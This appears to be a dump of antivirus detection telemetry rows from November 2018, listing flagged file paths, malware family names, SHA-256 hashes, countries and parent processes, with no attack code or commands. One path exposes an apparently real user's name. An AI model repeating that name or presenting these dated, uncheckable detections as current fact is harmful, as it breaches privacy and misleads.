  Row(detection=Row(filename='xifuzjcn.dll', filepath='C:\\WINDOWS\\system32\\xifuzjcn.dll', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-175459-fd25c042', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ade8d427\\AVSCAN-20181031-175437-F91B2B43\\AVSCAN-20181031-175459-FD25C042', filesize=8852000, name='PUA/FusionCore.P.#M1.#R1'), hash='d93fd89aa6de8363b364f522c38b171dc2a1d1525b7dd0d2c35fab0428c38255', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:55:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pg_config.exe', filepath='C:\\ManageEngine\\SupportCenter\\pgsql\\bin\\pg_config.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R5151'), hash='8075f81132cf522be54d082d9fa92bd5803395f4b384855ed9dd87466b39b900', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ykiT+3gxNUqfzPAm.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=81640, timestamp='2018-11-01T01:29:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:20:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-161811-01751669', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_291c2520\\AVSCAN-20181031-161552-EFC98C27\\AVSCAN-20181031-161811-01751669', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-125117-6a4455a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-125053-55C1DB13\\AVSCAN-20181101-125117-6A4455A9', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:51:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_00-09-39\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T18:40:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f7c6424485865fc6050d238220091f4e8d0e2e53', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\f7c6424485865fc6050d238220091f4e8d0e2e53', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='bacd2e2c3c9bd3384fbbbd0719ba5975a9320d6e5f5909e2993450fd71ab918c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T08:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163201-aafa061e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_17c53a39\\AVSCAN-20181101-163139-A6E8024E\\AVSCAN-20181101-163201-AAFA061E', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-134508-9edc7a70', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-134353-521A0B3E\\AVSCAN-20181101-134508-9EDC7A70', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='images.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\images\\images.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-01T12:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:16:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T15:34:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110442-cb244405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110442-CB244405', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.duolingo.exe', filepath='G:\\Android\\data\\com.duolingo.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='d4d7c6ceb4c44ff157789e6a77ecbba066258fcd7d8ec424eca4f2604ef6195c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='87e3e3d277d65e6f136e09c210c906d5b06446fdbe24c762da269fdc8d33db15', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\87E3E3D277D65E6F136E09C210C906D5B06446FDBE24C762DA269FDC8D33DB15', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='87e3e3d277d65e6f136e09c210c906d5b06446fdbe24c762da269fdc8d33db15', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:17:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:01:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003304-7d57b435', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003304-7D57B435', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='images.scr', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Required\\Images\\Images.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T03:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered sanid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sanid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0fc28a7b3ac5d444a505af34a934c84b392168778f791d795faa2f8e24b8a688', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\41AE011F01D55D8DB992079AAB3309EF327646BFB0BF5D77F380503016D39E7B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='41ae011f01d55d8db992079aab3309ef327646bfb0bf5d77f380503016d39e7b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:24:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213307-1a0de9e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8654d906\\AVSCAN-20181101-213249-174F8321\\AVSCAN-20181101-213307-1A0DE9E4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:33:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:44:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:02:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dynasty.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\Zuma 5\\Dynasty.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='1d73cb701fb704b82637e6a68b9e5e3b0946ed39ba4ba77155a2bf7892376f47', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23471_none_78ecb91b5c330d44\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215112-dfa1780c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e8942c23\\AVSCAN-20181101-214228-937D9B6E\\AVSCAN-20181101-215112-DFA1780C', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:51:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163022-23f42e73', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e8b6e3b\\AVSCAN-20181101-162948-1F59B97B\\AVSCAN-20181101-163022-23F42E73', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='65fe85d28b0ceda1371ad2d16579e0871d78f7a5885ffd4e0fbf4edfdc811b3d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:30:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0115436.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115436.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:35:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:30:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:42:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-053422-24a12d17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-053422-24A12D17', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:34:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124800-ce525a4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a3a5b2d\\AVSCAN-20181101-124621-C1199068\\AVSCAN-20181101-124800-CE525A4F', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:48:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.406\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.406\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:13:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181024-015745-863e9132', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181024-015434-5D92C0BC\\AVSCAN-20181024-015745-863E9132', filesize=548000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='2b65ccefbf496b78e0c6bf7c7393ac55a6100bd9fe11bf4e84c78650fc424017', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:24:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T23:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T18:03:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154611-ce60410b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154611-CE60410B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093544-9a8063a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093544-9A8063A0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093618-a0eb9e08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093618-A0EB9E08', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sitemap.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\sitemap.html', filesize=648000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='8b01b51a2d2391ce51d1d8014d9a25d7848b3772fac26bceb5d58944f9ebea02', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:53:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193824-1d5a7c28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_567802d4\\AVSCAN-20181101-193655-182C8F4A\\AVSCAN-20181101-193824-1D5A7C28', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:04:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150003-8cf71249', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150003-8CF71249', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ddodiag.exe', filepath='\\\\?\\C:\\Windows\\System32\\ddodiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='942e5fb4b0763132e51440dc2191881a1cf731e39ec68cad3a555604f4523228', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:51:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='l.812008.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO\\L.812008.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:59Z'), dt=datetime.date(2018, 11, 1)),
